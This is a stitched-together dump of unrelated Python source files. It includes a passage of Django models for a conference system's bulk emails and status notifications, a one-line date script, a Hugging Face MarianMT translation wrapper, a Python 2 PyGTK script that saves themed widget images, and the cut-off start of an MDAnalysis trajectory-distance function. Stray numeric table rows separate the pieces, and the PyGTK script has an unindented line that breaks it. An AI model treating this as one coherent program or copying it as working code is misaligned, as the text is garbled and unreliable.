        text_plain = self.text_plain
        if not text_plain:
            text_plain = html2text(self.text_html)
        return EmailFrame.render(
            text_plain, self.conference, subject, body
        )
class EmailSettings(models.Model):
    """Per-conference email configuration: which EmailFrame wraps all
    outgoing mail for the conference."""
    # SET_NULL: deleting a frame must not delete the settings row.
    frame = models.ForeignKey(EmailFrame, on_delete=models.SET_NULL, null=True)
    conference = models.OneToOneField(
        Conference, null=True, blank=True, on_delete=models.CASCADE,
        related_name='email_settings',
    )
class GroupMessage(models.Model):
    """Base record of one bulk mailing; the concrete subclasses
    (UserMessage, SubmissionMessage) define who the recipients are."""
    subject = models.CharField(max_length=1024)
    body = models.TextField()
    conference = models.ForeignKey(
        Conference,
        on_delete=models.CASCADE,
        related_name='sent_group_emails',
    )
    sent_at = models.DateTimeField(auto_now_add=True)
    sent_by = models.ForeignKey(
        User, on_delete=models.SET_NULL, null=True,
        related_name='sent_group_emails'
    )
    sent = models.BooleanField(default=False)

    @property
    def message_type(self):
        # Overridden by subclasses; base messages carry no type.
        return ''
class UserMessage(GroupMessage):
    """A group message addressed directly to a set of users."""
    recipients = models.ManyToManyField(User, related_name='group_emails')
    group_message = models.OneToOneField(
        GroupMessage, on_delete=models.CASCADE, parent_link=True)

    @property
    def message_type(self):
        return MSG_TYPE_USER

    @staticmethod
    def create(subject, body, conference, objects_to):
        """Create the message and attach every user in *objects_to*."""
        message = UserMessage.objects.create(
            subject=subject, body=body, conference=conference)
        message.recipients.add(*objects_to)
        message.save()
        return message

    def send(self, sender):
        """Render and send one email per recipient, then mark the message sent.

        Each body template is rendered with the merged conference + user
        context and wrapped in the conference's email frame (the plain-text
        variant is derived from the HTML one).
        """
        # Record who triggered the send before doing any work.
        self.sent = False
        self.sent_by = sender
        self.save()
        frame = self.conference.email_settings.frame
        base_context = get_conference_context(self.conference)
        for recipient in self.recipients.all():
            user_context = get_user_context(recipient, self.conference)
            context = Context(
                {**base_context, **user_context}, autoescape=False)
            EmailMessage.create(
                group_message=self.group_message,
                user_to=recipient,
                context=context,
                frame=frame,
            ).send(sender)
        # Stamp the completion time and flip the sent flag.
        self.sent_at = timezone.now()
        self.sent = True
        self.save()
        return self
class SubmissionMessage(GroupMessage):
    """A group message addressed to submissions: every author of each
    recipient submission receives an individual email."""
    recipients = models.ManyToManyField(
        Submission, related_name='group_emails')
    group_message = models.OneToOneField(
        GroupMessage, on_delete=models.CASCADE, parent_link=True)

    @property
    def message_type(self):
        return MSG_TYPE_SUBMISSION

    @staticmethod
    def create(subject, body, conference, objects_to):
        """Create the message and attach every submission in *objects_to*."""
        message = SubmissionMessage.objects.create(
            subject=subject, body=body, conference=conference)
        message.recipients.add(*objects_to)
        message.save()
        return message

    def send(self, sender):
        """Render and send one email per (submission, author) pair.

        The per-email context merges conference, submission and user data;
        each body is rendered from the stored template and wrapped in the
        conference's email frame.
        """
        # Record who triggered the send before doing any work.
        self.sent = False
        self.sent_by = sender
        self.save()
        frame = self.conference.email_settings.frame
        base_context = get_conference_context(self.conference)
        for submission in self.recipients.all():
            submission_context = get_submission_context(submission)
            for author in submission.authors.all():
                recipient = author.user
                context = Context({
                    **base_context,
                    **submission_context,
                    **get_user_context(recipient, self.conference),
                }, autoescape=False)
                EmailMessage.create(
                    group_message=self.group_message,
                    user_to=recipient,
                    context=context,
                    frame=frame,
                ).send(sender)
        # Stamp the completion time and flip the sent flag.
        self.sent_at = timezone.now()
        self.sent = True
        self.save()
        return self
def get_group_message_model(msg_type):
    """Return the concrete GroupMessage subclass for *msg_type*.

    Raises KeyError for an unknown type, like the mapping it replaces.
    """
    if msg_type == MSG_TYPE_USER:
        return UserMessage
    if msg_type == MSG_TYPE_SUBMISSION:
        return SubmissionMessage
    raise KeyError(msg_type)
def get_message_leaf_model(msg):
    """If provided a `GroupMessage` instance, check the inheritance, find
    the most descent child and return it. Now the possible leaf models are
    `UserMessage` and `SubmissionMessage`."""
    if hasattr(msg, 'usermessage'):
        return msg.usermessage
    elif hasattr(msg, 'submissionmessage'):
        return msg.submissionmessage
    # Also check, maybe a message is already a leaf:
    if isinstance(msg, (UserMessage, SubmissionMessage)):
        return msg
    # If neither succeeded, raise an error.
    # Bug fix: the f-string was missing braces, so the error text showed the
    # literal words "type(msg)" instead of the actual type.
    raise TypeError(f'Not a group message: {type(msg)}')
class EmailMessage(models.Model):
    """A single rendered email to one user, belonging to a GroupMessage."""
    subject = models.TextField(max_length=1024)
    text_plain = models.TextField()
    text_html = models.TextField()
    user_to = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        related_name='emails'
    )
    sent_at = models.DateTimeField(auto_now_add=True)
    sent = models.BooleanField(default=False)
    sent_by = models.ForeignKey(
        User,
        on_delete=models.SET_NULL, null=True,
        related_name='sent_emails'
    )
    group_message = models.ForeignKey(
        GroupMessage,
        on_delete=models.SET_NULL,
        null=True,
        related_name='messages',
    )

    @staticmethod
    def create(group_message, user_to, context, frame):
        """Render the subject/body templates with *context* and store the email.

        The markdown body is converted to HTML, and both variants are
        wrapped in the conference frame.
        """
        template_body = Template(group_message.body)
        template_subject = Template(group_message.subject)
        body_md = template_body.render(context)
        body_html = markdown(body_md)
        subject = template_subject.render(context)
        return EmailMessage.objects.create(
            user_to=user_to,
            group_message=group_message,
            subject=subject,
            text_html=frame.render_html(subject, body_html),
            text_plain=frame.render_plain(subject, body_md),
        )

    def send(self, sender):
        """Send the email once; calls after a successful send are no-ops."""
        if not self.sent:
            from_email = settings.DEFAULT_FROM_EMAIL
            # Bug fix: send_mail() expects a list of address *strings*; the
            # User instance itself was being passed before.  Assumes the
            # custom User model exposes `email`, per Django convention —
            # confirm against users.models.User.
            send_mail(self.subject, self.text_plain, from_email,
                      [self.user_to.email],
                      html_message=self.text_html)
            self.sent_at = timezone.now()
            self.sent_by = sender
            self.sent = True
            self.save()
        return self
class SystemNotification(models.Model):
    """This model represents a system notification fired on a specific event.

    The model itself doesn't define the circumstances in which the message
    must be sent, which are subject to views.

    Notification is defined with a mandatory name, optional description,
    subject and template. If template is not assigned or subject is not
    specified, messages won't be sent.

    Notification can also be turned off with `is_active` flag field.
    """
    ASSIGN_STATUS_SUBMIT = 'assign_status_submit'
    ASSIGN_STATUS_REVIEW = 'assign_status_review'
    ASSIGN_STATUS_ACCEPT = 'assign_status_accept'
    ASSIGN_STATUS_REJECT = 'assign_status_reject'
    ASSIGN_STATUS_INPRINT = 'assign_status_inprint'
    # NOTE(review): value is 'assign_status_publish' while the constant says
    # PUBLISHED — stored rows depend on this string, so changing it would
    # require a data migration; left as-is.
    ASSIGN_STATUS_PUBLISHED = 'assign_status_publish'
    NAME_CHOICES = (
        (ASSIGN_STATUS_REVIEW, 'Assign status REVIEW to the paper'),
        (ASSIGN_STATUS_SUBMIT, 'Assign status SUBMIT to the paper'),
        (ASSIGN_STATUS_ACCEPT, 'Assign status ACCEPT to the paper'),
        (ASSIGN_STATUS_REJECT, 'Assign status REJECT to the paper'),
        (ASSIGN_STATUS_INPRINT, 'Assign status IN-PRINT to the paper'),
        (ASSIGN_STATUS_PUBLISHED, 'Assign status PUBLISHED to the paper'),
    )
    name = CharField(max_length=64, choices=NAME_CHOICES)
    subject = CharField(max_length=1024, blank=True)
    is_active = BooleanField(default=False)
    type = CharField(max_length=64, choices=MESSAGE_TYPE_CHOICES, blank=False)
    body = TextField(blank=True)
    conference = ForeignKey(Conference, related_name='notifications',
                            on_delete=CASCADE)

    class Meta:
        constraints = [
            UniqueConstraint(fields=['conference', 'name'], name='unique_name'),
        ]

    def send(self, recipients, sender=None):
        """Send this notification to *recipients* via the matching
        GroupMessage subclass."""
        # Deliberately a silent no-op unless the notification is active and
        # fully configured (non-empty subject AND body) — see class docstring.
        if self.is_active and self.body and self.subject:
            message_class = get_group_message_model(self.type)
            message = message_class.create(
                self.subject, self.body, self.conference, recipients)
            message.send(sender)
# Seed data for the default per-conference notifications.  Subjects and
# bodies are Django templates rendered with the submission/user context;
# bodies are markdown (see EmailMessage.create()).
DEFAULT_NOTIFICATIONS_DATA = {
    SystemNotification.ASSIGN_STATUS_REVIEW: {
        'subject': 'Submission #{{ paper_id }} is under review',
        'type': MSG_TYPE_SUBMISSION,
        # NOTE(review): the `time` filter formats only the time of day for
        # the review deadline — confirm `date` wasn't intended.
        'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is assigned for the review.
Reviews are expected to be ready at **{{ rev_end_date|time:"H:i:s" }}**.'''
    },
    SystemNotification.ASSIGN_STATUS_SUBMIT: {
        'subject': 'Submission #{{ paper_id }} is in draft editing state',
        'type': MSG_TYPE_SUBMISSION,
        'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is in draft editing
state.
At this point you can modify review manuscript, title and other data if you
need.'''
    },
    SystemNotification.ASSIGN_STATUS_ACCEPT: {
        'subject': 'Submission #{{ paper_id }} was accepted',
        'type': MSG_TYPE_SUBMISSION,
        'body': '''Dear {{ username }},
congratulations, your submission #{{ paper_id }} **"{{ paper_title }}"** was
accepted for the conference.'''
    },
    SystemNotification.ASSIGN_STATUS_REJECT: {
        'subject': 'Submission #{{ paper_id }} was rejected',
        'type': MSG_TYPE_SUBMISSION,
        'body': '''Dear {{ username }},
unfortunately your submission #{{ paper_id }} **"{{ paper_title }}"**
was rejected according to the double-blinded review.
'''
    },
    SystemNotification.ASSIGN_STATUS_INPRINT: {
        # Bug fix: subject was copy-pasted from the REJECT entry
        # ("was rejected"), contradicting the body below.
        'subject': 'Submission #{{ paper_id }} is in print',
        'type': MSG_TYPE_SUBMISSION,
        'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** camera-ready was
sent to the publisher. We will let you know when the paper will be published.
'''
    },
    SystemNotification.ASSIGN_STATUS_PUBLISHED: {
        # Bug fix: subject was copy-pasted from the REJECT entry
        # ("was rejected"), contradicting the body below.
        'subject': 'Submission #{{ paper_id }} was published',
        'type': MSG_TYPE_SUBMISSION,
        'body': '''Dear {{ username }},
we are glad to inform you that your submission #{{ paper_id }}
**"{{ paper_title }}"** was published.
'''
    },
}
# Tiny demo script: print today's date in ISO format (YYYY-MM-DD).
from datetime import date
from datetime import datetime

dateToday = date.today()
print(dateToday)
# Copyright 2021 Marco Nicola
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, MarianMTModel, \
MarianTokenizer
from .config import ConfigLanguageModel
class Model:
    """Lazy wrapper around a Hugging Face MarianMT translation model."""

    def __init__(self, conf: ConfigLanguageModel, models_path: str):
        self._conf: ConfigLanguageModel = conf
        self._models_path: str = models_path
        # Both stay None until load() is called.
        self._tokenizer: Optional[MarianTokenizer] = None
        self._model: Optional[MarianMTModel] = None

    def load(self) -> None:
        """Load tokenizer and model weights (cached under models_path)."""
        name = self._conf.model
        logging.info(f'[{name}] - Loading tokenizer...')
        self._tokenizer = AutoTokenizer.from_pretrained(
            name, cache_dir=self._models_path)
        logging.info(f'[{name}] - Loading model...')
        self._model = AutoModelForSeq2SeqLM.from_pretrained(
            name, cache_dir=self._models_path)
        logging.info(f'[{name}] - Loaded.')

    def translate(self, text: str) -> str:
        """Translate *text* and return the decoded top output sequence."""
        batch = self._tokenizer(text, return_tensors="pt", padding=True)
        generated = self._model.generate(**batch)
        return self._tokenizer.decode(generated[0], skip_special_tokens=True)
| 1,753 | 520 |
#!/usr/bin/env python
# -*- mode: python; coding: koi8-r; -*-
import os
import gtk, gobject
imdir = 'images'
imtype = 'png'
background = '#efebe7'
#fill_color = 0xff000000 # red
fill_color = int('ff000000', 16)
if not os.path.exists(imdir):
os.mkdir(imdir)
gc = None
def draw_rect():
    """Fill the drawing area with an 800x800 red rectangle, creating and
    caching the graphics context (module-level ``gc``) on first use."""
    global gc
    if gc is None:
        gc = drawing_area.window.new_gc()
        colormap = gtk.gdk.colormap_get_system()
        gc.set_colormap(colormap)
        red = gtk.gdk.color_parse('red')
        colormap.alloc_color(red)
        gc.set_rgb_fg_color(red)
    drawing_area.window.draw_rectangle(gc, True, 0, 0, 800, 800)
def save_image(fn, w, h, x=0, y=0):
    """Snapshot a w*h region of the drawing area at (x, y), write it to
    ``imdir/<fn>.<imtype>``, then clear and repaint the red background."""
    scratch = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, w, h)
    scratch.fill(fill_color)
    grabbed = scratch.get_from_drawable(drawing_area.window,
                                        drawing_area.get_colormap(),
                                        x, y, 0, 0, w, h)
    grabbed.save(os.path.join(imdir, fn + "." + imtype), imtype)
    drawing_area.window.clear()
    draw_rect()
done = False
def save_callback(*args):
    """Expose-event handler: paint every themed widget part onto the
    drawing area and snapshot each region via save_image(), then quit
    the GTK main loop.

    Runs exactly once (guarded by the module-level `done` flag) because
    expose events may fire repeatedly.  Python 2 / PyGTK code.
    """
    global done
    if done: return
    done = True
    print 'create images'
    style = drawing_area.get_style()
    draw_rect()
    # separator
    w = 20
    style.paint_vline(drawing_area.window, gtk.STATE_NORMAL, None,
                      drawing_area, "frame", 0, w, 0)
    save_image('sep-v', 2, w)
    style.paint_hline(drawing_area.window, gtk.STATE_NORMAL, None,
                      drawing_area, "frame", 0, w, 0)
    save_image('sep-h', w, 2)
    # tree: normal/hover/pressed/disabled header boxes
    w, h = 32, 32
    w, h = 24, 24
    for fn, state, shadow in (
        ("tree-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
        ("tree-h", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
        ("tree-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
        ("tree-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
        ):
        style.paint_box(drawing_area.window, state, shadow,
                        None, drawing_area, "stepper", 0, 0, w, h)
        save_image(fn, w, h)
    # sizegrip
    w, h = 16, 16
    fn = 'sizegrip'
    style.paint_resize_grip(drawing_area.window, gtk.STATE_NORMAL, None,
                            drawing_area, "statusbar",
                            gtk.gdk.WINDOW_EDGE_SOUTH_EAST, 0, 0, w, h)
    save_image(fn, w, h)
    # progress: uses the progress bar's own style for the "bar" detail
    w, h = 37+3, 16+3
    progress_style = progress.get_style()
    fn = 'progress-h'
    progress_style.paint_box(drawing_area.window,
                             gtk.STATE_PRELIGHT, gtk.SHADOW_NONE,
                             None, progress, "bar", 0, 0, w, h)
    save_image(fn, w, h)
    # button
    w, h = 32, 32
    w, h = 28, 28
    for fn, state, shadow in (
        ("button-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
        ("button-a", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
        ("button-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
        ("button-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
        ):
        style.paint_box(drawing_area.window, state, shadow,
                        None, drawing_area, "buttondefault", 0, 0, w, h)
        save_image(fn, w, h)
    # pressed+active toggle button
    style.paint_box(drawing_area.window, gtk.STATE_PRELIGHT, gtk.SHADOW_IN,
                    None, togglebutton, "buttondefault", 0, 0, w, h)
    save_image("button-pa", w, h)
    # toolbar
    w, h = 16, 16
    w, h = 24, 24
    fn = "blank"
    # a plain filled pixbuf, saved directly (no widget painting involved)
    pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, w, h)
    pixbuf.fill(fill_color)
    pixbuf.save(os.path.join(imdir, fn+"."+imtype), imtype)
    for fn, state, shadow in (
        ("toolbutton-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
        ("toolbutton-a", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
        ("toolbutton-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
        ("toolbutton-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
        ):
        style.paint_box(drawing_area.window, state, shadow,
                        None, drawing_area, "buttondefault", 0, 0, w, h)
        save_image(fn, w, h)
    style.paint_box(drawing_area.window, gtk.STATE_PRELIGHT, gtk.SHADOW_IN,
                    None, togglebutton, "buttondefault", 0, 0, w, h)
    save_image("toolbutton-pa", w, h)
    # slider (scrollbar thumbs)
    msl = hscroll.style_get_property("min_slider_length")
    msl = 20
    sw = hscroll.style_get_property("slider_width")
    print '>>', msl, sw
    for t, w, h, state, orient in (
        ('hn', msl, sw, gtk.STATE_NORMAL, gtk.ORIENTATION_HORIZONTAL),
        ('ha', msl, sw, gtk.STATE_PRELIGHT, gtk.ORIENTATION_HORIZONTAL),
        # NOTE(review): 'hp'/'vp' reuse STATE_NORMAL rather than
        # STATE_ACTIVE -- confirm the "pressed" thumb is meant to look
        # identical to the normal one.
        ('hp', msl, sw, gtk.STATE_NORMAL, gtk.ORIENTATION_HORIZONTAL),
        ('hd', msl, sw, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_HORIZONTAL),
        ('vn', sw, msl, gtk.STATE_NORMAL, gtk.ORIENTATION_VERTICAL),
        ('va', sw, msl, gtk.STATE_PRELIGHT, gtk.ORIENTATION_VERTICAL),
        ('vp', sw, msl, gtk.STATE_NORMAL, gtk.ORIENTATION_VERTICAL),
        ('vd', sw, msl, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_VERTICAL),
        ):
        fn = 'sbthumb-'+t
        if 0:
            style.paint_slider(drawing_area.window, state, gtk.SHADOW_OUT,
                               None, drawing_area, "slider", 0, 0, w, h, orient)
        else:
            if orient == gtk.ORIENTATION_VERTICAL:
                w, h = h, w
            # NOTE(review): `shadow` here is left over from the toolbar
            # loop above (its last value, SHADOW_IN) -- confirm this is
            # intentional and not a missing loop variable.
            style.paint_box(drawing_area.window, state, shadow,
                            None, drawing_area, "stepper", 0, 0, w, h)
        save_image(fn, w, h)
    # restore the real theme-reported dimensions for the scale section
    msl = hscroll.style_get_property("min_slider_length")
    sw = hscroll.style_get_property("slider_width")
    # scale
    for t, w, h, state, orient in (
        ('hn', msl, sw, gtk.STATE_NORMAL, gtk.ORIENTATION_HORIZONTAL),
        ('ha', msl, sw, gtk.STATE_PRELIGHT, gtk.ORIENTATION_HORIZONTAL),
        ('hd', msl, sw, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_HORIZONTAL),
        ('vn', sw, msl, gtk.STATE_NORMAL, gtk.ORIENTATION_VERTICAL),
        ('va', sw, msl, gtk.STATE_PRELIGHT, gtk.ORIENTATION_VERTICAL),
        ('vd', sw, msl, gtk.STATE_INSENSITIVE, gtk.ORIENTATION_VERTICAL),
        ):
        fn = 'scale-'+t
        if orient == gtk.ORIENTATION_HORIZONTAL:
            detail = "hscale"
        else:
            detail = "vscale"
        # painted 2px larger, captured with a 1px offset (trims the border)
        style.paint_slider(drawing_area.window, state, gtk.SHADOW_OUT,
                           None, drawing_area, detail, 0, 0, w+2, h+2, orient)
        save_image(fn, w, h, 1, 1)
    w, h = msl, sw
    fn = 'scaletrough-h'
    style.paint_box(drawing_area.window, gtk.STATE_ACTIVE, gtk.SHADOW_IN,
                    None, scale, "trough", 0, 0, w, h)
    save_image(fn, w, h)
    # arrow (scrollbar steppers)
    w = h = hscroll.style_get_property("stepper_size")
    #w = h = 15
    # arrow glyph occupies the centered middle half of the stepper box
    arrow_width = w / 2
    arrow_height = h / 2
    arrow_x = (w - arrow_width) / 2
    arrow_y = (h - arrow_height) / 2
    alloc = hscroll.get_allocation()
    x0 = alloc.x
    x1 = alloc.x+alloc.width-w
    alloc = vscroll.get_allocation()
    y0 = alloc.y
    y1 = alloc.y+alloc.height-h
    sn = gtk.STATE_NORMAL
    sp = gtk.STATE_PRELIGHT
    sa = gtk.STATE_ACTIVE
    si = gtk.STATE_INSENSITIVE
    for fn, x, y, state, shadow, arrow_type, widget in (
        ("arrowleft-n", x0, 0, sn, gtk.SHADOW_OUT, gtk.ARROW_LEFT, hscroll),
        ("arrowleft-a", x0, 0, sp, gtk.SHADOW_OUT, gtk.ARROW_LEFT, hscroll),
        ("arrowleft-p", x0, 0, sa, gtk.SHADOW_IN, gtk.ARROW_LEFT, hscroll),
        ("arrowleft-d", x0, 0, si, gtk.SHADOW_OUT, gtk.ARROW_LEFT, hscroll),
        ("arrowright-n", x1, 0, sn, gtk.SHADOW_OUT, gtk.ARROW_RIGHT, hscroll),
        ("arrowright-a", x1, 0, sp, gtk.SHADOW_OUT, gtk.ARROW_RIGHT, hscroll),
        ("arrowright-p", x1, 0, sa, gtk.SHADOW_IN, gtk.ARROW_RIGHT, hscroll),
        ("arrowright-d", x1, 0, si, gtk.SHADOW_OUT, gtk.ARROW_RIGHT, hscroll),
        ("arrowup-n", 0, y0, sn, gtk.SHADOW_OUT, gtk.ARROW_UP, vscroll),
        ("arrowup-a", 0, y0, sp, gtk.SHADOW_OUT, gtk.ARROW_UP, vscroll),
        ("arrowup-p", 0, y0, sa, gtk.SHADOW_IN, gtk.ARROW_UP, vscroll),
        ("arrowup-d", 0, y0, si, gtk.SHADOW_OUT, gtk.ARROW_UP, vscroll),
        ("arrowdown-n", 0, y1, sn, gtk.SHADOW_OUT, gtk.ARROW_DOWN, vscroll),
        ("arrowdown-a", 0, y1, sp, gtk.SHADOW_OUT, gtk.ARROW_DOWN, vscroll),
        ("arrowdown-p", 0, y1, sa, gtk.SHADOW_IN, gtk.ARROW_DOWN, vscroll),
        ("arrowdown-d", 0, y1, si, gtk.SHADOW_OUT, gtk.ARROW_DOWN, vscroll),
        ):
        if 0:
            detail = 'hscrollbar'
            if widget is vscroll:
                detail = 'vscrollbar'
        else:
            # active branch: paint on the drawing area at the origin
            # instead of at the real scrollbar positions
            x, y = 0, 0
            detail = 'stepper'
            widget = drawing_area
        style.paint_box(drawing_area.window, state, shadow,
                        None, widget, detail, x, y, w, h)
        style.paint_arrow(drawing_area.window, state, shadow,
                          None, widget, detail, arrow_type, True,
                          x+arrow_x, y+arrow_y, arrow_width, arrow_height)
        save_image(fn, w, h, x, y)
    # combobox
    w, h = w, 24
    w, h = 16, 24
    alloc = hscroll.get_allocation()
    x1 = alloc.x+alloc.width-w
    arrow_width = w / 2
    arrow_height = h / 2
    arrow_x = (w - arrow_width) / 2
    arrow_y = (h - arrow_height) / 2
    detail = 'hscrollbar'
    widget = hscroll
    for fn, state, shadow, arrow_type in (
        ("comboarrow-n", gtk.STATE_NORMAL, gtk.SHADOW_OUT, gtk.ARROW_DOWN),
        ("comboarrow-a", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT, gtk.ARROW_DOWN),
        ("comboarrow-p", gtk.STATE_ACTIVE, gtk.SHADOW_IN, gtk.ARROW_DOWN),
        ("comboarrow-d", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN, gtk.ARROW_DOWN),
        ):
        style.paint_box(drawing_area.window, state, shadow,
                        None, widget, detail, x1, 0, w, h)
        style.paint_arrow(drawing_area.window, state, shadow,
                          None, drawing_area, "stepper", arrow_type, True,
                          x1+arrow_x, arrow_y, arrow_width, arrow_height)
        save_image(fn, w, h, x1, 0)
    w = 24
    for fn, state, shadow in (
        ("combo-rn", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
        ("combo-ra", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
        ("combo-rp", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
        ("combo-rd", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
        ):
        style.paint_box(drawing_area.window, state, shadow,
                        None, drawing_area, "button", 0, 0, w+2, h)
        save_image(fn, w, h)
    # focused variant: normal box plus a focus ring inset by d pixels
    style.paint_box(drawing_area.window, gtk.STATE_NORMAL, gtk.SHADOW_OUT,
                    None, drawing_area, "button", 0, 0, w+2, h)
    d = 3
    style.paint_focus(drawing_area.window, gtk.STATE_NORMAL,
                      None, drawing_area, "button", d, d, w-2*d, h-2*d)
    save_image('combo-rf', w, h)
    style.paint_shadow(drawing_area.window, gtk.STATE_NORMAL, gtk.SHADOW_IN,
                       None, drawing_area, "entry", 0, 0, w+2, h)
    save_image('combo-n', w, h)
    # checkbutton
    #define INDICATOR_SIZE 13
    #define INDICATOR_SPACING 2
    x, y = 2, 2
    w, h = 13, 13
    #w = h = checkbutton.style_get_property("indicator_size")
    for fn, state, shadow in (
        ("check-nc", gtk.STATE_NORMAL, gtk.SHADOW_IN),
        ("check-nu", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
        ("check-ac", gtk.STATE_PRELIGHT, gtk.SHADOW_IN),
        ("check-au", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
        ("check-pc", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
        ("check-pu", gtk.STATE_ACTIVE, gtk.SHADOW_OUT),
        ("check-dc", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
        ("check-du", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
        ):
##        style.paint_flat_box(drawing_area.window,
##                             gtk.STATE_PRELIGHT,
##                             gtk.SHADOW_ETCHED_OUT,
##                             gtk.gdk.Rectangle(0,0,w,h), drawing_area,
##                             "checkbutton", 0,0, w,h)
        style.paint_check(drawing_area.window, state, shadow,
                          None, drawing_area, "checkbutton", x, y, w, h)
        save_image(fn, w+2*x, h+2*y)
    # radiobutton
    for fn, state, shadow in (
        ("radio-nc", gtk.STATE_NORMAL, gtk.SHADOW_IN),
        ("radio-nu", gtk.STATE_NORMAL, gtk.SHADOW_OUT),
        ("radio-ac", gtk.STATE_PRELIGHT, gtk.SHADOW_IN),
        ("radio-au", gtk.STATE_PRELIGHT, gtk.SHADOW_OUT),
        ("radio-pc", gtk.STATE_ACTIVE, gtk.SHADOW_IN),
        ("radio-pu", gtk.STATE_ACTIVE, gtk.SHADOW_OUT),
        ("radio-dc", gtk.STATE_INSENSITIVE, gtk.SHADOW_IN),
        ("radio-du", gtk.STATE_INSENSITIVE, gtk.SHADOW_OUT),
        ):
##        style.paint_flat_box(drawing_area.window,
##                             gtk.STATE_PRELIGHT,
##                             gtk.SHADOW_ETCHED_OUT,
##                             gtk.gdk.Rectangle(0,0,w,h), drawing_area,
##                             "checkbutton", 0,0, w,h)
        style.paint_option(drawing_area.window, state, shadow,
                           None, drawing_area, "radiobutton", x, y, w, h)
        save_image(fn, w+2*x, h+2*y)
    # notebook
    w, h = 28, 22
    state = gtk.STATE_NORMAL
    shadow = gtk.SHADOW_OUT
    for fn, gap_h, state in (
        ("tab-n", 0, gtk.STATE_NORMAL),
        ("tab-a", 2, gtk.STATE_ACTIVE),
        ):
##        style.paint_box_gap(drawing_area.window, state, shadow,
##                            gtk.gdk.Rectangle(0,0,w,gap_h), drawing_area,
##                            "notebook", 0,0, w,gap_h, gtk.POS_TOP, 0, w)
        # active tab sits gap_h pixels lower than the selected one
        y = gap_h
        hh = h - y
        style.paint_extension(drawing_area.window, state, gtk.SHADOW_OUT,
                              None, drawing_area, "tab",
                              0, y, w, hh, gtk.POS_BOTTOM)
        save_image(fn, w, h+2)
    print 'done'
    gtk.main_quit()
def pack(w, row, col):
    """Attach widget *w* to the global table at (row, col), expanding and
    filling in both directions."""
    fill = gtk.EXPAND | gtk.FILL
    table.attach(w, col, col + 1, row, row + 1, fill, fill, 0, 0)
# Build a throwaway window holding one instance of each widget whose
# theme parts will be rasterized by save_callback().
win = gtk.Window()
win.connect("destroy", gtk.main_quit)
table = gtk.Table()
win.add(table)
row, col = 0, 0
drawing_area = gtk.DrawingArea()
#drawing_area.set_size_request(100, 100)
pack(drawing_area, row, col)
row += 1
# scrollbars provide theme metrics (stepper size, slider width) and
# allocation coordinates used by save_callback
vscroll = gtk.VScrollbar()
pack(vscroll, 0, 1)
hscroll = gtk.HScrollbar()
pack(hscroll, row, col)
row += 1
notebook = gtk.Notebook()
label = gtk.Label("Label")
notebook.append_page(label)
label = gtk.Label("Label")
notebook.append_page(label)
pack(notebook, row, col)
row += 1
button = gtk.Button("Button")
pack(button, row, col)
row += 1
checkbutton = gtk.CheckButton("CheckButton")
pack(checkbutton, row, col)
row += 1
progress = gtk.ProgressBar()
pack(progress, row, col)
row += 1
scale = gtk.HScale()
pack(scale, row, col)
row += 1
entry = gtk.Entry()
pack(entry, row, col)
row += 1
togglebutton = gtk.ToggleButton()
pack(togglebutton, row, col)
togglebutton.set_active(True)
row += 1
# capture runs once the drawing area is first exposed on screen
drawing_area.connect("expose-event", save_callback)
#gobject.timeout_add(2000, save_callback)
win.show_all()
#drawing_area.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse('red'))
gtk.main()
| 15,082 | 6,192 |
from __future__ import division
import matplotlib.pyplot as plt
import MDAnalysis as md
import numpy as np
def calculate_dists(gro_file, xtc_file):
    """Compute per-frame center-of-mass distances along a trajectory.

    Four distance traces are recorded for every frame: loop1-loop2,
    (both loops)-ASP, loop1-ASP and loop2-ASP, together with running
    extrema and the frame numbers at which they occur (printed).

    Args:
        gro_file: structure/topology file readable by MDAnalysis.
        xtc_file: trajectory file.

    Returns:
        tuple of four per-frame distance lists:
        (loop1-loop2, loops-ASP, loop1-ASP, loop2-ASP).

    Note:
        Python 2 / old MDAnalysis API (selectAtoms, pre-0.11).
    """
    u = md.Universe(gro_file, xtc_file)
    # NOTE(review): residue numbers presumably select the two flap loops
    # and the catalytic-ASP region of a protease dimer -- confirm against
    # the structure file.
    select_group1 = u.selectAtoms("backbone and (resnum 50 or resnum 51)")
    select_group2 = u.selectAtoms("backbone and (resnum 149 or resnum 150)")
